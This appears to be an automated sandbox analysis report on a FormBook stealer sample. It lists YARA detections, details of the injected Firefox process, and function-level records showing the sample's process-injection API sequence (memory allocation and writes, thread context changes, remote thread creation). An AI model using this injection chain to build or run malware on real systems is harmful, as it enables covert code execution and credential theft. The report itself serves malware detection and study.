                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Target ID:13
                                                  Start time:12:09:10
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                                  Imagebase:0x190000
                                                  File size:517064 bytes
                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:15.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:39%
                                                    Total number of Nodes:77
                                                    Total number of Limit Nodes:4
                                                    execution_graph 16123 d0ad60 16124 d0ad6c 16123->16124 16125 d0ade9 16124->16125 16134 4e40048 16124->16134 16139 4e417e3 16124->16139 16143 4e434c7 16124->16143 16147 4e40158 16124->16147 16152 4e4089c 16124->16152 16157 4e41634 16124->16157 16160 4e404ab 16124->16160 16165 4e4346a 16124->16165 16137 4e4008b 16134->16137 16135 4e5c551 16137->16135 16169 3403e5 16137->16169 16140 4e417ee 16139->16140 16177 e9d700 16140->16177 16144 4e434dc 16143->16144 16181 e9dc10 16144->16181 16145 4e434ea 16145->16145 16150 4e4008b 16147->16150 16148 4e5c551 16149 4e4164b 16149->16124 16150->16148 16151 3403e5 VirtualAllocExNuma 16150->16151 16151->16149 16153 4e4089f 16152->16153 16154 4e40907 16152->16154 16153->16154 16156 3403e5 VirtualAllocExNuma 16153->16156 16155 4e4164b 16155->16124 16156->16155 16158 4e4164b 16157->16158 16159 3403e5 VirtualAllocExNuma 16157->16159 16158->16124 16159->16158 16163 4e4008b 16160->16163 16161 4e5c551 16162 4e4164b 16162->16124 16163->16161 16164 3403e5 VirtualAllocExNuma 16163->16164 16164->16162 16166 4e43474 16165->16166 16168 e9dc10 NtSetContextThread 16166->16168 16167 4e434ea 16167->16167 16168->16167 16170 3403eb 16169->16170 16171 34256d 16170->16171 16173 343608 16170->16173 16174 343648 VirtualAllocExNuma 16173->16174 16176 343688 16174->16176 16176->16171 16178 e9d748 NtWriteVirtualMemory 16177->16178 16180 e9d79f 16178->16180 16182 e9dc50 NtSetContextThread 16181->16182 16184 e9dc84 16182->16184 16184->16145 16111 4c644e7 16112 4c64537 16111->16112 16115 4c4b8d8 16112->16115 16116 4c4b91d NtCreateThreadEx 16115->16116 16118 4c4b979 16116->16118 16193 e9cd08 16194 e9cd53 NtAllocateVirtualMemory 16193->16194 16196 e9cd9a 16194->16196 16197 363550 16198 36359b LdrLoadDll 16197->16198 16200 3635dc 16198->16200 16209 1f26e8 16210 1f2728 CloseHandle 16209->16210 16212 1f2759 16210->16212 16107 e9d1f0 16108 e9d23e NtProtectVirtualMemory 16107->16108 16110 e9d288 16108->16110 16119 e9e940 16120 e9e9c9 CreateProcessW 16119->16120 16122 e9eb6b 16120->16122 16201 e9f100 16202 e9f148 NtResumeThread 16201->16202 16204 e9f17d 16202->16204 16185 4c4b3f8 16186 4c4b440 NtWriteVirtualMemory 16185->16186 16188 4c4b47e 16186->16188 16189 1f24a0 16190 1f24e8 NtQuerySystemInformation 16189->16190 16192 1f2523 16190->16192 16205 1f29f0 16206 1f2a38 VirtualProtect 16205->16206 16208 1f2a73 16206->16208

                                                    Executed Functions

                                                    Function 001F13B0 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 1f13b0-1f13e1 1 1f13eb-1f13f5 0->1 2 1f13f8-1f1418 1->2 3 1f141e 2->3 4 1f154d-1f1554 2->4 3->1 3->4 5 1f15de-1f1601 3->5 6 1f14ba-1f14c7 3->6 7 1f1679 3->7 8 1f1533-1f1548 3->8 9 1f16d2-1f16d6 3->9 10 1f17b1-1f17c6 3->10 11 1f15b0-1f15c5 3->11 12 1f172e-1f173b 3->12 13 1f14cc-1f14e1 3->13 14 1f146c-1f1470 3->14 15 1f156c 3->15 16 1f17eb-1f17ef 3->16 17 1f17c8-1f17e9 3->17 18 1f15c7-1f15dc 3->18 19 1f14e6-1f14fb 3->19 20 1f1606-1f161f 3->20 21 1f1425-1f144e call 1f1130 3->21 22 1f16a5-1f16cd 3->22 23 1f1765-1f176f 3->23 24 1f1641-1f164c 3->24 25 1f1500-1f152e call 1f1130 3->25 26 1f1740-1f1753 3->26 56 1f155b-1f1567 4->56 32 1f1571-1f15a3 5->32 6->2 49 1f1682-1f1684 7->49 8->2 35 1f16df-1f16f0 9->35 36 1f16d8-1f16dd 9->36 34 1f1772-1f17a4 10->34 11->32 12->32 13->2 27 1f1479 14->27 28 1f1472-1f1477 14->28 15->32 30 1f17f8-1f1809 16->30 31 1f17f1-1f17f6 16->31 17->34 18->32 19->2 91 1f1626-1f163c 20->91 90 1f1456-1f146a 21->90 33 1f1755-1f1762 22->33 23->34 62 1f164e-1f1654 24->62 63 1f1664-1f1674 24->63 25->2 26->33 46 1f147e-1f14b5 27->46 28->46 47 1f180b-1f1842 30->47 31->47 32->26 87 1f15a9 32->87 33->23 88 1f17aa 34->88 89 1f1847 34->89 55 1f16f2-1f1729 35->55 36->55 46->2 47->34 64 1f168d-1f1697 49->64 65 1f1686-1f168b 49->65 55->32 56->7 74 1f1658-1f165a 62->74 75 1f1656 62->75 63->32 77 1f169e 64->77 65->77 74->63 75->63 77->22 87->5 87->7 87->9 87->10 87->11 87->12 87->15 87->16 87->17 87->18 87->20 87->22 87->23 87->24 87->26 87->89 95 1f185e 87->95 96 1f18b0-1f18c3 87->96 97 1f18c5-1f18cf 87->97 88->10 88->16 88->17 88->23 88->89 88->95 88->96 88->97 89->95 90->2 91->32 102 1f1863-1f1895 95->102 96->102 102->97 112 1f1897 102->112 112->95 112->96 112->97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4l$(4l
                                                    • API String ID: 0-2463812532
                                                    • Opcode ID: 3134f554ff862f6f4bceb71a6ebd2c884d1dca7f8c54011fa31f2a67640a3b53
                                                    • Instruction ID: f0eff3df447001bbbb9126642a35580bb7b389c7deecbcedd3e8f993cac8b7b2
                                                    • Opcode Fuzzy Hash: 3134f554ff862f6f4bceb71a6ebd2c884d1dca7f8c54011fa31f2a67640a3b53
                                                    • Instruction Fuzzy Hash: 78C1C131A04209DFCB1CEB74DAA157D7BB2ABC5358B65542ED206EF7A4EF309C018B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003403E5 Relevance: 1.9, Instructions: 1877COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 787 3403e5-3404d6 808 3404dc-3404f6 787->808 809 343209-343215 787->809 808->809 813 3404fc-340546 808->813 813->809 820 34054c-340566 813->820 820->809 823 34056c-3405a0 820->823 826 3405a6-3405dc 823->826 827 34064f-3406a7 823->827 826->809 836 3405e2-34063e 826->836 827->809 841 3406ad-3406e5 827->841 836->809 846 340644-34064a 836->846 841->809 847 3406eb 841->847 848 3406f1-340721 846->848 847->848 848->809 853 340727-340759 848->853 853->809 858 34075f-340791 853->858 858->809 863 340797-3407ef 858->863 863->809 868 3407f5-3407f7 863->868 869 3407fd-340899 868->869 870 3408aa-340902 868->870 869->809 887 34089f-3408a5 869->887 870->809 883 340908-34094c 870->883 883->809 890 340952 883->890 889 340958-340988 887->889 889->809 895 34098e-3409f2 889->895 890->889 895->809 904 3409f8-340a56 895->904 904->809 909 340a5c-340a5e 904->909 910 340a64-340a9c 909->910 911 340b1d-340b71 909->911 910->809 920 340aa2-340ac2 910->920 911->809 924 340b77-340bc1 911->924 920->809 926 340ac8-340b0c 920->926 924->809 931 340bc7 924->931 926->809 932 340b12-340b18 926->932 933 340bcd-340c17 931->933 932->933 933->809 940 340c1d-340c35 933->940 940->809 943 340c3b-340c6d 940->943 943->809 948 340c73-340cd1 943->948 948->809 953 340cd7-340cd9 948->953 954 340cdf-340d15 953->954 955 340d9a-340e38 953->955 954->809 964 340d1b-340d39 954->964 955->809 973 340e3e 955->973 964->809 970 340d3f-340d89 964->970 970->809 976 340d8f-340d95 970->976 975 340e44-340e74 973->975 975->809 981 340e7a-340ee2 975->981 976->975 981->809 990 340ee8-340f62 981->990 990->809 995 340f68-340f6a 990->995 996 340f70-34101e 995->996 997 341023-34105b 995->997 1015 3410dd-341113 996->1015 997->809 1006 341061-341081 997->1006 1006->809 1012 341087-3410d7 1006->1012 1012->1015 1015->809 1021 341119-34118d 1015->1021 1021->809 1030 341193-341215 1021->1030 1035 3412dc-341384 1030->1035 1036 34121b-341251 1030->1036 1054 34138a-3413c0 1035->1054 1036->809 1045 341257-341275 1036->1045 1045->809 1051 34127b-3412d7 1045->1051 1051->1054 1054->809 1060 3413c6-3413e4 1054->1060 1060->809 1063 3413ea-34140a 1060->1063 1063->809 1066 341410-34144c 1063->1066 1066->809 1071 341452-3414d2 1066->1071 1071->809 1076 3414d8-3414da 1071->1076 1077 3414e0-341588 1076->1077 1078 341599-3415cf 1076->1078 1077->809 1095 34158e-341594 1077->1095 1078->809 1087 3415d5-341649 1078->1087 1097 34164f-3416c5 1087->1097 1095->1097 1097->809 1106 3416cb-341725 1097->1106 1106->809 1113 34172b-341795 1106->1113 1116 34186a-3418a2 1113->1116 1117 34179b-3417d3 1113->1117 1116->809 1127 3418a8-34192e 1116->1127 1117->809 1126 3417d9-341865 1117->1126 1136 341934-341a06 1126->1136 1127->1136 1136->809 1151 341a0c-341a82 1136->1151 1151->809 1154 341a88-341a8a 1151->1154 1155 341b65-341c25 1154->1155 1156 341a90-341ae8 1154->1156 1174 341c2b-341d75 1155->1174 1156->809 1169 341aee-341b54 1156->1169 1169->809 1175 341b5a-341b60 1169->1175 1174->809 1192 341d7b-341d7d 1174->1192 1175->1174 1193 341d83-341e47 1192->1193 1194 341e4c-341e82 1192->1194 1212 341f1e-341f72 1193->1212 1194->809 1203 341e88-341ea6 1194->1203 1203->809 1209 341eac-341f18 1203->1209 1209->1212 1212->809 1220 341f78-342074 1212->1220 1231 342157-34218f 1220->1231 1232 34207a-3420b0 1220->1232 1231->809 1242 342195-342227 1231->1242 1232->809 1241 3420b6-342152 1232->1241 1251 342233-342269 1241->1251 1242->809 1252 34222d 1242->1252 1251->809 1257 34226f-3422ad 1251->1257 1252->1251 1257->809 1262 3422b3-3422e3 1257->1262 1262->809 1267 3422e9-342301 1262->1267 1267->809 1270 342307-34237d 1267->1270 1273 342383-3423db 1270->1273 1274 34245e-342496 1270->1274 1273->809 1287 3423e1-342459 1273->1287 1274->809 1283 34249c-34252e 1274->1283 1293 342534-34256b call 343608 1283->1293 1287->1293 1294 34256d-34257e 1293->1294 1296 342596-3425b9 1294->1296 1297 342580-342594 1294->1297 1298 3425bf 1296->1298 1297->1298 1298->809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945814327.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_340000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88d7d9ff23a9782bf15f3e5d1fa2ebcc5c1d54cb857099a3505585f75f62a511
                                                    • Instruction ID: 5d0299a42e72edad920cca02008891fa7772004837b54706b880444a8b4d8c03
                                                    • Opcode Fuzzy Hash: 88d7d9ff23a9782bf15f3e5d1fa2ebcc5c1d54cb857099a3505585f75f62a511
                                                    • Instruction Fuzzy Hash: 36031DB4E00215CFC760EF78C984B99B7F5BB48348F2044AA991DE3759DB386E848F65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E9D700 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1345 e9d700-e9d74e 1347 e9d75e-e9d79d NtWriteVirtualMemory 1345->1347 1348 e9d750-e9d75c 1345->1348 1350 e9d79f-e9d7a5 1347->1350 1351 e9d7a6-e9d7cb 1347->1351 1348->1347 1350->1351
                                                    APIs
                                                    • NtWriteVirtualMemory.NTDLL(?,?,00000000,?,?), ref: 00E9D790
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: MemoryVirtualWrite
                                                    • String ID:
                                                    • API String ID: 3527976591-0
                                                    • Opcode ID: 67451ff85fcab7bbe7de3266b5106d5907d5b7621428f0b7e72268138e7b7fa3
                                                    • Instruction ID: a8b17304b3a7537cb8c033494bd0ae6026252614cc6d2bd964b4e171e088df1d
                                                    • Opcode Fuzzy Hash: 67451ff85fcab7bbe7de3266b5106d5907d5b7621428f0b7e72268138e7b7fa3
                                                    • Instruction Fuzzy Hash: 282105759042189FCF10DFA9D884BDEBBF4FF48314F50882AE919B7240D7749944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C4B8D8 Relevance: 1.6, APIs: 1, Instructions: 66nativethreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1355 4c4b8d8-4c4b977 NtCreateThreadEx 1358 4c4b980-4c4b9a5 1355->1358 1359 4c4b979-4c4b97f 1355->1359 1359->1358
                                                    APIs
                                                    • NtCreateThreadEx.NTDLL(?,6DE1FA28,?,?,?,00000000,?,?,?,?,?), ref: 04C4B96A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 2f9b8ada1c4de2b8693dea63323a0222800b77a758b929966916ca228404e46a
                                                    • Instruction ID: c6c6ef0adf1961a4ab6fcb270bee66bc13052a50738d5d59bbda8a983e2d8920
                                                    • Opcode Fuzzy Hash: 2f9b8ada1c4de2b8693dea63323a0222800b77a758b929966916ca228404e46a
                                                    • Instruction Fuzzy Hash: A3213972900219ABDF00CFA9C844AEEBBB5FF48314F15851AE918B3250C779A964CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E9D1F0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1363 e9d1f0-e9d286 NtProtectVirtualMemory 1366 e9d288-e9d28e 1363->1366 1367 e9d28f-e9d2b4 1363->1367 1366->1367
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00E9D279
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: 510f2cf9f9046f339dba207288769a7fb27d53c638c13741c7da4dec90b5fd46
                                                    • Instruction ID: 4dc2442724c1fe22b10e6957d17ad10973f17949b082aec10e689bacdf8a2285
                                                    • Opcode Fuzzy Hash: 510f2cf9f9046f339dba207288769a7fb27d53c638c13741c7da4dec90b5fd46
                                                    • Instruction Fuzzy Hash: 0321F2B1D006099FCB10CFAAD884AEEFBF4BF48314F60842EE519B7250C775A904CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E9CD08 Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1379 e9cd08-e9cd98 NtAllocateVirtualMemory 1382 e9cd9a-e9cda0 1379->1382 1383 e9cda1-e9cdc6 1379->1383 1382->1383
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 00E9CD8B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: cec5eebf0d793cdef82a3f315f205be255efb3ded0786d974c845ca7cfe3f063
                                                    • Instruction ID: 97829d41dc0e48b631d517325e0261459c85fe9f6c2cc816587f289c13487e21
                                                    • Opcode Fuzzy Hash: cec5eebf0d793cdef82a3f315f205be255efb3ded0786d974c845ca7cfe3f063
                                                    • Instruction Fuzzy Hash: A42114719002099FCF10DFAAD884ADEFBF4BF48314F60842AE519B7250CB749904CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F2498 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1387 1f2498-1f2521 NtQuerySystemInformation 1390 1f252a-1f254f 1387->1390 1391 1f2523-1f2529 1387->1391 1391->1390
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 001F2514
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: e2c52f25decc2febf2a70db2de7b2dbdb5efb34a32f4042a57896c7d258241a6
                                                    • Instruction ID: 7a59d8d0665f81c4b3304f04fb028ffc4cece544f57cf1e42a532e2f340b96f8
                                                    • Opcode Fuzzy Hash: e2c52f25decc2febf2a70db2de7b2dbdb5efb34a32f4042a57896c7d258241a6
                                                    • Instruction Fuzzy Hash: D52125719042089ECB10CFAAD8847EEFBF0AF49314F20841ED419B7250CB759945CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00363550 Relevance: 1.6, APIs: 1, Instructions: 59libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1403 363550-3635da LdrLoadDll 1406 3635e3-363608 1403->1406 1407 3635dc-3635e2 1403->1407 1407->1406
                                                    APIs
                                                    • LdrLoadDll.NTDLL(?,?,?,?), ref: 003635CD
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945869489.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_360000_Client.jbxd
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2a77e5dfeed9d1c8cacaa303a0f611e55c67655a4e034c5e6a56eefebd0ea2ba
                                                    • Instruction ID: 9a5bff1ff8ff02125f9522e26ad1f4de400e2a5f4818bc0f4c3ca2041388df24
                                                    • Opcode Fuzzy Hash: 2a77e5dfeed9d1c8cacaa303a0f611e55c67655a4e034c5e6a56eefebd0ea2ba
                                                    • Instruction Fuzzy Hash: 71210771D006089FCB10DFAAD884ADEFBF4BF49314F51881EE519A7240C7749A44CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C4B3F8 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1411 4c4b3f8-4c4b47c NtWriteVirtualMemory 1414 4c4b485-4c4b4aa 1411->1414 1415 4c4b47e-4c4b484 1411->1415 1415->1414
                                                    APIs
                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04C4B46F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID: MemoryVirtualWrite
                                                    • String ID:
                                                    • API String ID: 3527976591-0
                                                    • Opcode ID: b795bc1de0ef059ec4f343500f969bdfa20d0055aa88d4a4abad3bb538f9de56
                                                    • Instruction ID: 64c96eb94961fbc934a065496713df5d2df21f9e09743806fec5472c62120299
                                                    • Opcode Fuzzy Hash: b795bc1de0ef059ec4f343500f969bdfa20d0055aa88d4a4abad3bb538f9de56
                                                    • Instruction Fuzzy Hash: 572115B1D006089BDB10CFAAC8446AEFBF5AF88314F50841AE519A7250DB74A904CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F24A0 Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1419 1f24a0-1f2521 NtQuerySystemInformation 1422 1f252a-1f254f 1419->1422 1423 1f2523-1f2529 1419->1423 1423->1422
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 001F2514
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 560a648e3734a97fa6d017f5c1b7f7811fd8277324ff95b0337e03b34ef6fff0
                                                    • Instruction ID: ef7916377283c87366870935e9927ca065e2faef12bbdd51fc93e4c8c1473b00
                                                    • Opcode Fuzzy Hash: 560a648e3734a97fa6d017f5c1b7f7811fd8277324ff95b0337e03b34ef6fff0
                                                    • Instruction Fuzzy Hash: 9C11E5719046089BDB10DFAAC8447EEFBF4AF49214F61841ED519A7250DB749944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E9F100 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtResumeThread.NTDLL(?,?), ref: 00E9F16E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: dd68ae53b550a509fd821cd2df29d77968bbd8552fe5b3e9be1122a64a17acc4
                                                    • Instruction ID: 49d5e6fcb0d223762cb2aeef5335b50fff69ee3a8cf6a2c11c0635cfea4db3a7
                                                    • Opcode Fuzzy Hash: dd68ae53b550a509fd821cd2df29d77968bbd8552fe5b3e9be1122a64a17acc4
                                                    • Instruction Fuzzy Hash: D1111AB1D046089ADB10DFAAC44479FFBF4AF49214F61842ED419B7240CB749904CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E9DC10 Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtSetContextThread.NTDLL(?,?), ref: 00E9DC75
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: abc8181689a016b820dc0030d86bf68338db98de33ce46c95e51ced9c9b30974
                                                    • Instruction ID: 80498a5bb214e2ae3eb9024550663971def94e08edbc6ee05014e62837fd6883
                                                    • Opcode Fuzzy Hash: abc8181689a016b820dc0030d86bf68338db98de33ce46c95e51ced9c9b30974
                                                    • Instruction Fuzzy Hash: E41128719046088BDB10DFAAD8457EFFBF5AF89318F21881ED515B7240CB79A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001F3618 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ffff
                                                    • API String ID: 0-3827681309
                                                    • Opcode ID: ae61b51661752a1e0dfcac49a6b19be508f68f8bd59f19847a55008ba16d532e
                                                    • Instruction ID: 983ef07113955b900c9f7953a3620151b43dac598b7c9a901b0cba079c18a943
                                                    • Opcode Fuzzy Hash: ae61b51661752a1e0dfcac49a6b19be508f68f8bd59f19847a55008ba16d532e
                                                    • Instruction Fuzzy Hash: BC91B274A003099FCB09DFA5D8909EEBBB6FF88310F258529E511EB761DB70AD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C40048 Relevance: .9, Instructions: 913COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07d355589c84a3d8716419c67fbd7b30804c6ddaec4c4eaaec392c52054ac41f
